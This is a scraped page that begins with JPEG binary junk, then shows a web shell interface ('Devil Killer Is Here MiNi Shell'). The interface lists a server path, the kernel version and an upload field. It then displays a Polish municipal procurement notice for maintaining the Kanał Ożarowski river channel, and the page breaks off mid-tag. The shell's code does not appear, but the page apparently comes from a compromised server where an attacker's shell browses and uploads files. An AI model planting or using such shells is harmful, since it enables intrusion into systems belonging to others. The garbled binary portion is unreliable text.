JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250129/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250129/0007400701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Prace na korycie rzeki Kanału Ożarowskiego poprzez jego koszenie i bieżące utrzymanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ożarów Mazowiecki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013271269</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ożarów Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-850</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 731-32-00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@ozarow-mazowiecki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ozarow-mazowiecki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Prace na korycie rzeki Kanału Ożarowskiego poprzez jego koszenie i bieżące utrzymanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a68d4a02-534e-4796-bd01-54a42d5eea61</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00074007</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00059761/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.10 Utrzymanie i konserwacja koryta rzeki Kanał Ożarowski</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a68d4a02-534e-4796-bd01-54a42d5eea61 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl.<br/>Szczegółowe zasady komunikacji elektronicznej zostały określone w Rozdziale 9 SWZ.<br/>2. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na ściśle określony adres e-mail:<br/>zampub@ozarow-mazowiecki.pl (nie dotyczy składania ofert w postępowaniu). Skorzystanie z tego adresu w sytuacji gdy platforma<br/>działa poprawnie spowoduje zignorowanie przesłanej wiadomości.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowo w Regulaminie Platformy e-Zamówienia, dostępnym na stronie internetowej ttps://ezamowienia.gov.pl<br/>oraz w „Centrum Pomocy”.<br/>2. Sposób sporządzenia dokumentów elektronicznych lub cyfrowego odwzorowania i poświadczania za zgodność musi być zgodny z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>3. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. 2020 poz. 2452), dalej w treści jako: ,,rozporządzenie’’ oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii<br/>23 grudnia 20220 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń jakich może żądać<br/>Zamawiający od Wykonawcy (Dz. U. 2020 poz. 2415).<br/>4. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 Rozporządzenia, których wykaz dla przedmiotowego postępowania jest<br/>podany w rozdziale 11 SWZ, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia<br/>Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się<br/>jako załączniki do formularzy komunikacyjnych.<br/>5. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacji nie będą miały bezpośredniego zastosowania,<br/>(o ile dotyczy)<br/>6. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia, przekazywane w postępowaniu<br/>sporządza się w postaci elektronicznej:<br/>- w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i<br/>przekazuje się jako załącznik), lub<br/>- jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>7. Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem dedykowanych<br/>formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do<br/>komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi.<br/>Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). W<br/>przypadku załączników, które są, zgodnie z ustawą Pzp lub rozporządzeniem, opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem Wykonawcy/Wykonawcy wspólnie<br/>ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym<br/>(otaczającym). W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości<br/>uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ<br/>wewnętrzny).<br/>8. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do<br/>komunikacji”służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych pozyskanych od Wykonawcy w ramach<br/>wykonywania Umowy jest Zamawiający.<br/>2. W ramach wykonania obowiązku informacyjnego, zgodnie z rozporządzeniem Parlamentu Europejskiego i rady (UE)2016/679 z<br/>dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich informacji danych oraz uchylenia dyrektywy 95/46/WE (Dz. Urz. UE L 119 z 04.05.2016) - dalej<br/>RODO, Wykonawca poinformuje osoby, których jakiekolwiek dane osobowe zostały przekazane Zamawiającemu, o posiadaniu i<br/>przetwarzaniu danych osobowych tych osób przez Zamawiającego w celu wykonywania Umowy.<br/>3. Wykonawca zobowiązany jest także poinformować osoby, o których mowa powyżej, o prawie dostępu do treści danych, ich<br/>poprawiania, modyfikacji oraz możliwości skorzystania z innych uprawnień przewidzianych unormowaniami RODO.<br/>4. Dane identyfikujące Wykonawcę,przedmiot umowy i wysokość<br/>wynagrodzenia, stanowią informację publiczną w rozumieniu art. 1 ust. 1 ustawy z dnia 6 września 2001 r. o dostępie do informacji<br/>publicznej (t.j. Dz. U. z 2019 r. poz. 1429),która podlega udostępnianiu w trybie przedmiotowej ustawy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP.271.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 453416,67 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1	Przedmiot zamówienia stanowią usługi polegające na bieżącym utrzymaniu koryta rzeki Kanał Ożarowski oraz koszeniu.<br/>Przedmiot zamówienia wykonany będzie na podstawie porozumienia zawartego z Państwowym Gospodarstwem Wodnym Wody Polskie.<br/>Rzeka Kanał Ożarowski w km 0+0130-17+480; nachylenie skarpy 1:1,5; średnia szerokość dna 1- 2 m; głębokość waha się w przedziale 1,60- 2,96 m; Położenie: gmina Ożarów Mazowiecki; powiat warszawski zachodni; województwo mazowieckie <br/><br/>4.2	Realizacja przedmiotu zamówienia obejmuje:<br/>- przeprowadzanie robót utrzymaniowych koryta rz. Kanał Ożarowski w tym konserwacja koryta i skarp, koszenie koryta i burt, hakowanie, częściowe odmulanie i niezbędne naprawy urządzania wodnego na terenie Gminy;<br/>- utrzymanie bieżącego porządku i czystości w korycie rzeki Kanał Ożarowski oraz obustronnych pasów eksploatacyjnych wraz z utylizacją zebranych zanieczyszczeń;<br/><br/>4.2.1	Zakres usług obejmuje:<br/>- Ręczne lub mechaniczne wykoszenie skarp, dna i pobocza z wygrabieniem i złożeniem w kopki;<br/>- Wycięcie krzaków i odrostów rosnących na skarpach, poboczu i w dnie z rozdrobnieniem;<br/>- Mechaniczne wydobycie roślin korzeniących się w dnie;<br/>- Mechaniczne rozplantowanie i rozdrobnienie wydobytych roślin korzeniących się w dnie;<br/>- Oczyszczenie i ewentualne konieczne naprawy przepustów; <br/>- Rozebranie przetamowań;<br/>- Faszynowanie, naprawa uszkodzonych skarp<br/>- Odmulanie, <br/>- Usunięciu materiał roślinnego lub jego rozdrobnień;<br/>- Wykonywaniu powyższych prac w razie konieczności w trybie awaryjnym na wezwanie Zamawiającego.<br/><br/>4.5 Szczegółowy opis zakresu przedmiotu zamówienia zawarty został w niniejszej SWZ oraz w załączniku Nr 2 do SWZ (z wyłączeniem tiret 3), na który składają się:<br/>- OPZ (opis przedmiotu zamówienia),<br/>- załączniki graficzne z kilometrażem rzeki Kanał Ożarowski,<br/>- przedmiar określający przewidywany zakres prac – zał. nr 1 do SWZ.<br/>4.6 Załącznik Nr 1 do SWZ zawiera przewidywany zakres ilościowy prac do wykonania. Zamawiający zastrzega sobie<br/>możliwość wprowadzenia zmian w zakresie rodzaju prac (liczby i krotności), jak również stosowania prac zamiennych<br/>pomiędzy poszczególnymi pozycjami załącznika Nr 1 do SWZ.<br/>4.7 Zmawiający zastrzega sobie także prawo do zmiany krotności poszczególnych czynności wynikających z przedmiaru z<br/>uwagi na bieżące potrzeby i warunki środowiskowe utrzymujące się w okresie trwania usługi np. z uwagi na wysokie stany<br/>wód. W szczególności o 50% może być zmniejszona pozycja 10, 18 z przedmiaru na rzecz pozycji 3, 11, 12, 22 z<br/>przedmiaru.<br/>4.8 Zakres usług dotyczących przedmiotu zamówienia może ulec zmianie maksymalnie o +/-30%, o ile wyniknie to z<br/>warunków pogodowych lub z ustaleń i uzgodnień dokonywanych w trakcie wykonywania przedmiotu zamówienia, w<br/>szczególności ustaleń z Zamawiającym.<br/><br/>4.9	Zamawiający w szczególnych wypadkach (zagrożenie dla życia lub mienia) zastrzega sobie możliwość zlecenia (pisemnie, drogą elektroniczną lub telefonicznie SMS-em) podjęcia działań interwencyjnych, nie ujętych w zleceniu za dany okres, a wyszczególnionych w Załączniku Nr 1 do SWZ.<br/><br/>W powyższych przypadkach wykonawca zobowiązany jest do przystąpienia do realizacji zlecenia w trybie natychmiastowym maksymalnie w ciągu 2 godzin, od chwili przekazania telefonicznego, SMS-em lub pocztą elektroniczną powiadomienia przez upoważnionego pracownika Zamawiającego.<br/><br/><br/>4.10	Zamawiający zastrzega sobie także możliwość zmiany zakresu usług oraz rezygnacji z części usług <br/>do wysokości zabezpieczonych środków w budżecie.<br/><br/>4.11	Szczegółowy zakres prac do wykonania Zamawiający będzie określał Wykonawcy, w zależności od <br/>bieżących potrzeb, pisemnym zleceniem lub drogą elektroniczną. Terminy realizacji będą określane, zgodnie ze złożoną ofertą Wykonawcy.<br/><br/>4.12	Zamawiający informuje, że na realizację zleceń Wykonawca ma max. 21 dni kalendarzowych, <br/>a na przystąpienie do realizacji pojedynczych zleceń max. 48 godziny.<br/><br/>Wykonawca może zaoferować krótszy czas na realizację zleceń (podany w dniach kalendarzowych) oraz krótszy czas na przystąpienie do realizacji pojedynczych zleceń (podany w godzinach), które będą oceniane przez Zamawiającego przy wyborze najkorzystniejszej oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246000-3 - Roboty w zakresie regulacji rzek i kontroli przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90721800-5 - Usługi ochrony przed naturalnym ryzykiem lub zagrożeniami</p> <p class="mb-0">45246000-3 - Roboty w zakresie regulacji rzek i kontroli przeciwpowodziowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje udzielanie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, tzn. polegających na powtórzeniu podobnych<br/>usług, stanowiących niniejsze zamówienie podstawowe:<br/>- wartość usług, o których mowa powyżej może wynieść maksymalnie do 10% wartości zamówienia podstawowego;<br/>- warunki na jakich zostaną udzielone powyższe usługi – będą zgodne z przedmiotem zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">A) Cena – waga kryterium – 60 %<br/><br/>Zamawiający ofercie o najniższej cenie przyzna 60 punktów, a każdej następnej ofercie przyporządkowana <br/>zostanie liczba punktów proporcjonalnie mniejsza stosując wzór:<br/><br/><br/> najniższa cena z rozpatrywanych ofert<br/>Wartość punktowa ceny = ----------------------------------------------------- x 60<br/> cena badanej oferty<br/><br/><br/><br/> B) Czas realizacji każdego zlecenia od momentu zgłoszenia przez Zamawiającego<br/> – waga kryterium - 30%<br/><br/>Wymagany przez Zamawiającego czas realizacji pojedynczych zleceń przez Wykonawcę nie może być dłuższy niż 21 dni kalendarzowych od momentu zgłoszenia (pisemnie, drogą elektroniczną, SMS-em) przez Zamawiającego.<br/>Wykonawca podaje czas realizacji pojedynczych zleceń w dniach (kalendarzowych) od momentu otrzymania zgłoszenia (pisemnie, drogą elektroniczną) przez Zamawiającego.<br/><br/>Zamawiający ofercie o najkrótszym czasie realizacji pojedynczych zleceń przyzna 30 punktów, a każdej następnej ofercie przyporządkowana zostanie liczba punktów proporcjonalnie mniejsza z zastosowaniem wzoru:<br/><br/><br/>Wartość punktowa czasu realizacji <br/>pojedynczych zleceń od momentu <br/>zgłoszenia przez Zamawiającego najkrótszy czas realizacji pojedynczych zleceń<br/>= ----------------------------------------------------------------- x 30<br/> zaoferowany czas realizacji pojedynczych zleceń badanej oferty <br/><br/><br/>Zamawiający zastrzega, że maksymalny czas realizacji pojedynczych zleceń przez Wykonawcę, który może zaoferować to 21 dni kalendarzowych. W przypadku wskazania w ofercie dłuższego czasu realizacji pojedynczych zleceń oferta Wykonawcy zostanie odrzucona jako niezgodna z SWZ.<br/><br/><br/>C) Czas przystąpienia do realizacji poszczególnego zlecenia od momentu zgłoszenia przez Zamawiającego – waga kryterium - 10%<br/><br/>Wymagany przez Zamawiającego czas przystąpienia do realizacji pojedynczych zleceń przez Wykonawcę nie może być dłuższy niż 48 godzin od momentu zgłoszenia (pisemnie, drogą elektroniczną lub SMS-em) przez Zamawiającego.<br/><br/>Wykonawca podaje czas przystąpienia do realizacji pojedynczych zleceń w pełnych godzinach, od momentu zgłoszenia: drogą elektroniczną, SMS lub pisemnie, przez Zamawiającego.<br/><br/>Zamawiający ofercie o najkrótszym czasie przystąpienia do realizacji pojedynczych zleceń przyzna <br/>10 punktów, a każdej następnej ofercie przyporządkowana zostanie liczba punktów proporcjonalnie mniejsza z zastosowaniem wzoru:<br/><br/>Wartość punktowa czasu <br/>przystąpienia do realizacji pojedynczych zleceń od <br/>momentu zgłoszenia przez <br/>Zamawiającego	<br/> najkrótszy czas przystąpienia do realizacji pojedynczych zleceń<br/>= ----------------------------------------------------------------------------------- x 10<br/> czas przystąpienia do realizacji pojedynczych zleceń badanej oferty<br/><br/>Zamawiający zastrzega, że maksymalny czas przystąpienia do realizacji pojedynczych zleceń przez Wykonawcę, który może zaoferować to 48 godzin. W przypadku wskazania w ofercie dłuższego czasu realizacji pojedynczych zleceń oferta Wykonawcy zostanie odrzucona jako niezgodna z SWZ.<br/><br/>UWAGA:<br/>W przypadku zagrożenia bezpieczeństwa ludzi lub mienia, np. zagrożenie powodzią po gwałtownych zjawiskach atmosferycznych etc.) Wykonawca zobowiązany jest do przystąpienia do realizacji zlecenia w trybie natychmiastowym maksymalnie w ciągu 2 godzin, od chwili przekazania telefonicznego, SMS-em lub pocztą elektroniczną powiadomienia przez upoważnionego pracownika Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas realizacji każdego zlecenia od momentu zgłoszenia przez Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przystąpienia do realizacji poszczególnego zlecenia od momentu zgłoszenia przez Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p 